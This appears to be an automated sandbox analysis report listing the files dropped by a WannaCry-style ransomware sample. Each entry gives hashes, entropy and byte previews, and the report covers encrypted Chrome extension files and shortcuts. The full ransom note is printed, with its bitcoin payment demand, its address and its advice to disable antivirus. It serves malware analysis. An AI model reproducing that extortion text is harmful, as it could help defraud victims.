                                Preview:WANACRY!.......:.|v.q..r.n.UG....H. "....u.s..au..TPw.<S..Gb%..@..y...s$.59t..F.../....I......}M..;....+t#.E.........<7c...G.....NA.._...b.{!...TA.lM.@^.U..a+.W.m.........6^......m.o.M.p.Z..2`.B.....U....@fz+...,....BJe..ex..0.7.J.....4....b.m..R!f.:..O ............].e.....,'.Z...G..&.i...4......n.[.7OFMW.6...!WV...z3...$...,3.R.........&30....i...'...'...i.T..".u..#......`..'w.b;..V[....0.v.GM..j. e..8..v.U....#._...L.3\&.N,.8.....: .zd%..........|R....^&@.7u.shM...8..k.....7.........$..v._8.....6..3.....q.X=SDk...B3DM9Z...........e...;....K.)ZY.{AS....s.:/....3.7.....:.......'`n.t...:.....f..ieY.L.0:.n..=.2.:...:|w...@Z.4.9N{.5.,.g.Z$P....SM.\U.,.2..?..c....}R......G..{w../......%V.DJ...!.Z$=Qp.X......~.$........`.......r....xX;../.|...W..I....~......6KZ...-..+]..<%...&xs.7A.. .:...b.y.N.P{bX~$.. H.]...K..[p.z=.+.|.&.....w..jm.z...'......`P.d.2.N......?......pvF...&..v.X"].I.sF...G.gw$........Q.o..7]..k.n@./..0!a.L.`......F.p..

                                C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469\ActivitiesCache.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.999824442069547
                                Encrypted:true
                                SSDEEP:24576:eTnvanhIJDn1a2+mC1K80EBih1kw+YR16KCDEuAgVS4v8rEZ:wvsIJr1Z+hQ8tSawXWD671EZ
                                MD5:66C80BFE878B60EF486F4AA96EA0B5E6
                                SHA1:B9828E6F8AE37AA1326E0B9A2B1836B722D16589
                                SHA-256:1CA43A6BE8B3FC4AB9FCB1A74521A67FFBF9C35DCEAE8BF6B291A7072C15BDFF
                                SHA-512:F8FEF32AE302AA96A6696706B6D27DAC70567EC2541491D8F6B210FA55EDDC578B6FF10B739379D34CB43C306E24DFE0280F3ED6E49BACCA79498DF86A74E420
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....9....h..h...... .]V...u..9.`f.h.....|[..<.....)..k.....k.....:.O..+.b.5F6....]..H...s......9Kz$...L@....b...mZ.. .....}..1...k]..E......z..D...._.H.A.&....J....GAv...3.b.0..7..M....~G.#J...h...;.PV.P3......t..... ..OS.R...<;..D...iP.d.....CK..T............`.a..{.x.}.;R"......z .6..2(..?F....{C.........N....xQ%..NJ......J.b(Rn....~.F/u.kG............V.:.QRk.?.....C..L.#..uG.8..zZ._.f#sVS....#[|....NS...!.V.....o......Y.R..:.s.5..R(?t.w.>-..T.c.....]1.. ..?\.C...a...l......*.yvW...m<.....3v...A.-./f..h..!...,.....w...p]....b.X........Koq{...{...<.. ..q'........Q._0.U..d..A/@.8....dv.l.....Or#z.uI3....._Z.e.@..0...K.58...-.....e6...fJ<0..!BI...)./..*wi..?.CPQw..#......+y.....%..../..:.#..[9....&.q5X..F....0......._.....JXQ..6*........S.n.`~...v.[../..A....P.......I..#U&.8.r..gc);.U.....1......X2T.W.._,...W.....`..]M.n...=..(.9L..].....R...X*...D.v.h4......gG$l..f....]..[....8E..'.Z..zoH9|.KEMD6r.w.Xl.f..7.PF.D[..?2..~...{....\..15.%e..

                                C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.999848948485185
                                Encrypted:true
                                SSDEEP:24576:kxUmWF/ZUf/2CU7Lk4Vdqb7O0xsgYkEDKrtSNa:JmWtZUI1YpoKrtCa
                                MD5:92C48F8AB7790677B166C17A2016DB8B
                                SHA1:8D56E618246C4DFC4DB3A8F87FB3E4B4744E0F71
                                SHA-256:A326ABDDF9893971DB48C88569EAFF6C2843AD53C40351062FD104500A09116B
                                SHA-512:02A6D138A6057E0A62310F164321A7498EF48723FC9DA1F712907FE46286039EF6FDFCA4CE099E3DDB5C5A11E256DF7B82D59D83BEB7C116AE670715C7F1CD87
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....O..T..L....=..mp..W..k...d.c.Q.......1.L.t......>F`o^4...l.&...)....V.,W7.uj...z.z-.......0T........g..L.I.h..N....?.....]...%.h$....a.).....Xg.;..nw.~P...{.j%.k.....lp.V.W...*.|.)&..r!....t)...F........d.K.'....O..:C.;.=#A...i...T..y}.&7ta.9.B.............j.7....../...........'T&.$.u.o&Y..D.T<.U......Yx..<....8......v...84...."..".O.....p..|pP+......_S..5w.`G.m$Fp.....+..F..R/..e7.Z...|..R.....f....{>......JG.ue.....n.{.+.^.m.....`.B(....9.C.Kls:G...sXL.}5so..-^.U.4.lw.{...M........XP..l.{.4+...0.s.a.6.u pc#.a2.d.9.Z..GR.....n.....L.9.Y.5.?o....I.Zj.4:*faom.S{.6.-...._h.-.yNI....+....I.b.Q....\.ezp(...m=.G....P.`S,.>3Rv........9..7n.j.?'....U,...c...... ......w.Vi..jjw.Eq...No..UCm.i....s\h.kX{"....i{....)..86A...{.Q$G.I.[..`......4.-.B....[.}........*.......K..2..|:.......,[.z4.b...3.N.D^...G..M.....0.....A..n......J..NE5....% .j.P.<.....m.7....i%.GD.4./..29.......e(0.."....8..h.@...nVl*. ..g..@JD.|........"......{.%

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\icon_128.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3656
                                Entropy (8bit):7.947234596187803
                                Encrypted:false
                                SSDEEP:96:o8z906WsE+PWZYdPuTE6Fr7/Q4ERUMHzU38A6DLm4Sw/AV6:lXOx+36oHHzE8f+4Swk6
                                MD5:2A4B8B847B8616F6D99E57CD476F2ADF
                                SHA1:583F32B01FF98C78C2F0F3C613F9337B988EFC44
                                SHA-256:C45F8FAAF6EB01683748B00339760A3F4E15C34FA22C8D2DEBE77EE22797CEA7
                                SHA-512:E0BE825CA33874104F9AC7B22E6896F889014EF9FE3A8A2D9D7A99A652DB0482C92EA7E744AA25304542C09B1D160856BE5C27D7A3A97CCBA364C17CEA729035
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....K.|.NP.`.o....U2Y..b......v....zbQ0....19.h..F..........7..gm.,h.I.[{./...I.p^..o3.j...E0.......y.....k.,.......o.D.Nf._........w..........n....z...9.LV...'../.J....je.WY..@5..............D..N.......%.....|S.K.......d..d$'..x.u.2...*...S..........,........D...[)R..&.G...X.;N.j.w.+@.....<,...8fC./e..0V.=......C.>.....\..E.Ea_.....)...r ,..z0..F.a....s.Y..^....v.],....nV;5CB..HRr..H.)lC........Z.9.Y....;..5.a. ...ol.....&l:kw.E..J/....*..E...a......P...z.......t..?,.p..;t.......9..X...+^..~.7.@..d...h7..o..>...6....^....o..t;.1....y...R...C.].?T...G.Ox3:%...8}.R'.. `P.,<....O'.'lo.?..tU.5.VI.....<^.. PChO!H2.'l._..,bZ.[.bj.6.!.m...-W...u#A.....<.W...........E.7HTVv[...G....Zws8=.Sl.%......._g#d'TK.'.T....%...,.....h.....zTI..3.....>.CZ..D....\.D6...r.ez.".@......W2.2E4I!..i.s.-xD....Ep...K/...{...f......]........u....b....<.u[.R..\.v.4...0.k...Y.J..r...e-FH.8.E B97..H.a..w.!.....q...B-#z...L.Riz....|M.. .3).0......x."eSz....m.)

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\icon_16.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):440
                                Entropy (8bit):7.4212026683684575
                                Encrypted:false
                                SSDEEP:12:bkE0l5xj+nvXTeWEcQM4kFFDUgMJiSkQM0wYRIi/Jy:bk1IqWEfkFFDUJiD0wKy
                                MD5:5FBFB0E8F18854DE3B4C3881A1FC5BD2
                                SHA1:BD3321D21B7CD321271E4F090B932A1C1855D3F4
                                SHA-256:B683A531D4E821E42F197484DDE0935F8CAAC54CDDBDA72790917B38164A2EF0
                                SHA-512:1EDDEA59AEF70BAD004CE88ADB5925C490301291D1EB39FFD8F9271B9E58E8B19A455F74CE8DA173CDD8B6EDF8F22E5E60DE1DB3F8AA0CF8D3843DDC2710DAB0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......:1.........h......Bg..\>..ob...9.......=....=nx..V..D..yzpS..ahm..*..x.k..4OHK.B...B.P.t...*I..Q...........B..9(F-f81"..0..8...>1.....r6......z.........7..],.....9.g.2}A>...f....:.]..l.H.'pY1=.......5...1.n.CrhV.i.......&y..oh'"..?.2......`..................&..C.N.q..T.W'dp.....N.1.Y..@.t.)EfW....j._..|B...+@.+KY..JS.D....I.....U..V....p.p..;k&.%...I_5lF...;..T....1.........5....p..5..6..;[R.Og.JN.&..#*

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\main.js.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):376
                                Entropy (8bit):7.333060734811522
                                Encrypted:false
                                SSDEEP:6:bkEDn1nWt50C2AXAVmVo0x25faABWhy72GbW2L7zOCav1gI3yeOzgCLzJ88edmyd:bkEDnAskImEihyCOW2ba9nO8Cv+my0WF
                                MD5:870517DFFF4922E32A4B1B877942A644
                                SHA1:34AE8BEA85493A708F96946F873183D6227AB159
                                SHA-256:DFF45BD302BC4DE4A84C43ACB62538FE7799172F4C6E3A328AF1645432F4A5D4
                                SHA-512:4BA5714CAF59156322F1ED3CA947F2D62130C1D6110C9316F131972CD0EA8F9A6D1167EB7B9DCBC2FB2E19E74A3B6E5460A45FB49BB5B639900D8AA31AE4C62B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....]cI.6.?.=P.. ....2......!.x...Ne..6..LX..%..L.._.+>H..e..s...t!..^.....{...d.8.:.r8'.h.O....K8..4.h.s`..2H.@-~...<.....L.....W!:='pm [...d...#...B....C... ..4.iG\?..w.../......R.~[.qO....Ah(..y...=.q...`Y.....4L6C.2....E..d..e....O....m.l...# ....._........x{n...-.#(.....S...*.).0...e..C..F........32d.^.,......y).M.....Q.7.A.ta..k..(.-.D..).gO

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_128.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3496
                                Entropy (8bit):7.951024188907682
                                Encrypted:false
                                SSDEEP:96:odRtpe6i9D55a7J0nPFrwLPwn4cr3uJs744:Tp5El0twLPwn4Y144
                                MD5:E2B8B33B761C2332D7D00FB15ECD2D67
                                SHA1:733D9C1A2C86137ACB343388F1619BD550C963E8
                                SHA-256:0503DF8E204D263840B006B5730E103A1E80A35A0073BF0DDB44D663D5C05E05
                                SHA-512:5332AB482712A7BCA1D945E7FE8F653FFF76213296EFC5CE411B043E2BF79D00C259542E0F0A5CECAEFBA22E812899B229F7172633A305F03E21755E91998F43
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....l.:..!..#...........ej;...y.v...Y........K.2.....t.t.B.M(.....!.l..%Uf...^\.+...U...YH.;....#z%{l..p.Y.?..n.-.=..%..k.....;.w..<_rV...Ravxg..k.F.....u..H.3.7Z...v.*J....w..wd...";.,.>.a.d6....n.I...a)j}...d.v+.._`. #...I.5Y.U'yJC...0...R. .z$0...............RmkJP..1....^S.5.i..`...3....S..7....=9.#.Kb....(...w.4.ZN.L..Z.Hz..s.?E..r..p.I./s...0....Xl=..,...1..g.d8.U.A8..6)....E....aC.!6.l..6....kM.....-.T".,.(..'.TI.....a.;v..*.f.o.. ..F..$G.&....uc0....6$....5....9.........(.2..F....L..[..@..i"h.o%z...9...zW.y."yK...g.4Wgw.Z.109.-.D].......y.z......@M.O......e.......&..r.f... Rh.wer.......s....t.HXc*.q1/t_rw1.\..m.............B.z.........Aq.{(.7.(....].0...|R.h....>KLS(./.%.,.u..D...t...Z{....U.#R:N.J...X.GbP7 .x8h..#W..'..`.y0.@.C9..i......*A.LM`...@..z.U.z.v.....#x.L.u.p'u..:../L..f..e.....U&._..S!!..(H:..G.....P..~.....&Ro/p+...%.i...t.k..X.;fz._.:...Zc..>....0.7..*..j...%v.~O..+*..68_T.*.#...a..I.ZS|.....PO....

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_16.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):424
                                Entropy (8bit):7.4395960363451925
                                Encrypted:false
                                SSDEEP:12:bkEkid/BkFoWKpcHMDt3uRsyNqn24Tv4bYlCbybJj:bkQVQpKCHMDUVyTvE2Pj
                                MD5:6007F3D5E4347714CE9865DD41B3DB93
                                SHA1:FBCE3C4340FE3ED265B1ED3CCDE0F5EAE579AD88
                                SHA-256:9129C8C88FBC569DFBA49479511A7767B0BF093F7853F1F1DECE12B1BEB325C9
                                SHA-512:2135A50D190607794E20AF3F109AD73BD99E4ED9672456349CEB5F1229AC6EDC92DB9FF86046FBC7E7AB16E0A7B9BC8D51A85CF65DFA8C8CC2CD79DD83F70943
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....K...G...C.G\=..4.@d.jbG^$M.....5......E$f...G`.1............-s.b-...L.yH(.rJ7q.R.&..5s...~..6.'..6....z.9..WA.h8.[...a.jo......Y."...#...v..-GK$.?,..U...)V....5\Cb|.u.G.n.(3U.......j!.....7......0r.1R...J..d.<.b.E.s...L....@Y.0&...)x.e?^f..Z..3J7.................\+....n.P#."k.Z.~U....Mh...Bo.w9..>....Q..u..d.Z.....R\..wJ..M..~/t.p..d..U'e.u'R.......[......<..IvAyo.'^.(@.p.{.B.{.X<.`.S?.(|..r

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\main.js.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):376
                                Entropy (8bit):7.345844114067075
                                Encrypted:false
                                SSDEEP:6:bkEFSzQLij5oP+yXBAWIFJCB8b7QrKOmStib4abn0gq8rf4Szt+lXs9M2M8N8LxK:bkEoz0Y5o9mlFJV+jmStisN8cS4K91gk
                                MD5:FDEA1FFD63B00A7358B12EE787040E9F
                                SHA1:15DAE9DC95277657552A6A980BB0109C9B3D2C18
                                SHA-256:7498135834B21CFC6A6DC266A1F78033D1FE4DE03D39F90B7667890CBE9E9B52
                                SHA-512:A25A7EF5FB9D51CCDB70D64CB37BFD681D650DE0968C8E75A2810098B25D19079EB49F458E68EE4F6D44BCDB766369B13F33868C653925797B374E0DFC14DF77
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........i..|.......U.7..n.VyT2$....@l.F^![._Ly.0....m.(}....?........7...0...o.?..jc...h....w....y....{......~.t..7.9.L...h..~G..b...S..UMMR.U..|.na..w...`.K.....Y..y..>)|d....ki...k.../Q.,..^.....%.R..WP.....Q..--..h.k@!m..J!.....rD.8#.uY.?0.n.9i....Uib....[.......)`\..h|..s1i-..T.._MX..8c.c...:.s[7..X...J..b...\.=.{..0`g.4}z..q........2.....T('.\..h.....

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\128.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4200
                                Entropy (8bit):7.950124016583354
                                Encrypted:false
                                SSDEEP:96:ouhd3vZf5f7NbaNuPoYkTFMocrZcdXJFoD94UzcZHCLbp:H3v55f7NuNuPoY4X0i5FoeLo
                                MD5:240F83739A87D0D8532D73FE223864DC
                                SHA1:E1E782D87C1A1C212797F4648DE85597585C60F1
                                SHA-256:523B859971915CFDE1FCDB384AAAE8FAE1116EC5E28DBE09F202DD91E542824C
                                SHA-512:1C333992E83D70E966791BA1B9B3E54075E2D7EF9D0B9EBA3C64CDCA9473C745E40AE2787BA7C5B09AF8268B460D3DFD7097067426908AD0DD989FCD7BB290B1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....2S........j...@.....,.h_aF.......o......K....rf#...kl.p..H.:y=.~`I../.......]......J$...Y.....E.}.I...V..N|..-...m.M.'...u..X........5^.-.._....}B...JhZ.%..,.B.-......6P.)...D.l...6].dP..*.?..M....w...j.Qyu. !t.D(.j.........)..vmM...QO..;M......D..........#..*.W.@..EE{.5................S(t......l...ND./`+...>...BWa9..O......"~)..|....@...6...I.........m.....f....W..U.B.C.cV.%A...]..d.[8.P..M..pTc......f.M.-;......+2.5.4.....c...N...4.*..U^.p_Bs;>.*U...9.......Z...Up.u.Z....w.../.;.$5......4..j<=...ZJ;#J:W.f.......m...J6v.%.}...L.]h......3......W.|/.at...$u{ n.|-....s..l!#3.........r/.E..Y,..b.6.....h.......7.k.+..4'.rz........m.x....i......>r.n6..M...,..^.....&..S.......$..x....I=.. 3].....3....8.....w..O..O.....P..1......b..yrLF...d.......u..M...$.......i...d..X....!A.1.@p.K.-%.9=J.t...P.[R...NC5....|..i.".5.Cb+.>g...,.A.~:-:.g2.!.".xi.2.U......ViAnz..].@...4xgp.i...1...VG...sx5....5.L.)m...g.y..l...S...#..n.J.7N.i0iU..r

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\128.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3688
                                Entropy (8bit):7.944624419053773
                                Encrypted:false
                                SSDEEP:96:optgk/e0m0tQUIGi4NUEtqB6kDfnTpNsQl0:SCCej0tQUIojcMUTpg
                                MD5:AF0D682B428E3F596381161E0E92965D
                                SHA1:228D08302ABAC95D830A73EC8E17EA41AA11930F
                                SHA-256:4B738FEC02C2642268EA62A9BED53C341A6D2DF216A6F5362ACB985C8F09356E
                                SHA-512:EB18A78DDE2A8E54260FD42344359E9D20DA834401D1B2154FD84799CEB70BCB72EAD5DA4DCCAA2770A84E11A8056DBFF2E84FF8CBE0DF5829C76F4B4EA6E93C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....X.....I..1du9.9H..../{..N...;.GG.R..pc]'jf....JN..$W.............h..[[.......fwV....V...#....P.....#.Y.dvpa7...x.v..&.?..`.F..~..^..#......y.W.R@............>Tj}.t8.\.....k..M.\.%.....l-.p.N ......a.WxA...2..u...R...Xs.I......W..2.q.m1}.)..F..,.......M...........$.x.+v-..wE}......2ps..c`o...g.^9.TZ.X.T.X..,..]E....f..=s......3O..u.....LUm.Z.$.UbW7.b....BN{>..3....Z.=.....]Y9.eeM.....xI>....g.N..!'...=g..e..LF.....LZ@.v.vP|........E.9h..e&......JA....E....?.N.=. .\&.....h.J...H....R <M.:`..>...H..i=.C..q_~SJ.}e.x.do...sg.#P....LVj\.Tb.f*p<...u.|wz.6.w..].....tDi.3.FFLnt.x..-.I@m.0.Q.-m<.....R..7...../....^.|..=JC.."./9^....}.6...$9.el..E&.T..(...WolC..l|......|...g...u..{.x[&......B...5Z^.W2G>L.......'/./..7..L.z....l=CSM../.4..Tw.N...v...G.3.e.&.=LFe7.J...%>~..i...k.u.zX3.J.....+x..).L.Db..S!..L>......w<p..u..-&OLZ.q..}..A.2=..H2#..K.wF..7....[.....,z..@>.>|.>.i$8k..Rg4....l....3...t.c..B>................@.x*6.....Q....W..&q..Y.4.8.

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\icon_128.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3688
                                Entropy (8bit):7.950896469844662
                                Encrypted:false
                                SSDEEP:96:onCZVeKAuVKprdcZ/2U1qQofdbbgqkrM5eEHQ9:aCZRAuMrKZ/v/Od3kr4eEw9
                                MD5:81831C045BB3B724CBA74B9614DBAB4C
                                SHA1:06DFC789AB51A59264E61201CFE8258524A0AC48
                                SHA-256:86515FA0B811B24E1905C6C824E22914DAE79518528B68904AD53E99119EE8E8
                                SHA-512:F38D4E2CE1E9A919A1F0229F99EAF5CDD5D56B8AF3550EDA39DED5D72DA499857BA59AE3DC26C9B9ADECCF70BE9B6D194E75713174D074D6435230F4FEB2EC36
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....o....f...W.......(....o..}...yW\.Dg.$...4=.:....o.'JY.T....a......S.*..a..x.C.*1...`&._...>..|i...5XW...mF....S.j.8L.CMt<.ODr......R<:..Yy.z}.ge..s.&~.%.<t.....#w.HaXo...r.=Y.....e+XK>.........?6/..0.......s...C..v).38..l.......}..Ra......oI.......H.......3.)....5........J..p......~c...FD...\j...6.@.r.F."N&.Ez....E..O..C.?...H.......'k.p..X...... ..Dx......fR....m2...mh!.p.I.....W.../...Y.3Vsz}.^;u.....TB...u..B...O..m.."a.!+q...%Jiv...yoa./.f.o.K..s^.....j...w..@....R.[..pcyw/].....&F..l....t....x.....ai..;Q.....Y...I..;*d.<.;.....s.....a@7.s.P..~.4~..TH..$c|).<.I..+.`[...N....|...:5...;..........a...|.$.Zd.Pb.f.............i.'...<AB...?.Lv...E..C.-.O.....]bFe..r....t-..%JCM'Ij..q6.....6M..0.$.[.x....Z.Z.,"........5..18X..o.=.l..c%.F...0.c. .I(.D..w.J....-'....;?X=.....5..:.5.^JO...1...........*.....T..i.b...&U%2.y..V...y/<!.:.tax>..;.M,.y?..F..C...:\...s...).|@.h..B....jYS.SX.Ct..qQ}M'@..w....].J..U.x..p..K.7X..D....w.E.%Y#>.H

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\icon_16.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):440
                                Entropy (8bit):7.509238129934189
                                Encrypted:false
                                SSDEEP:12:bkEdkU2niZo4DwTOmTA67a3BeFcp6ySYnXPF:bkE2iZlM6270Be6wbYnXPF
                                MD5:0DC2A6F1632B7419741A8AE5207AE5A6
                                SHA1:95CB184D71D83D48020FAC1C472F29DAFA20C7E9
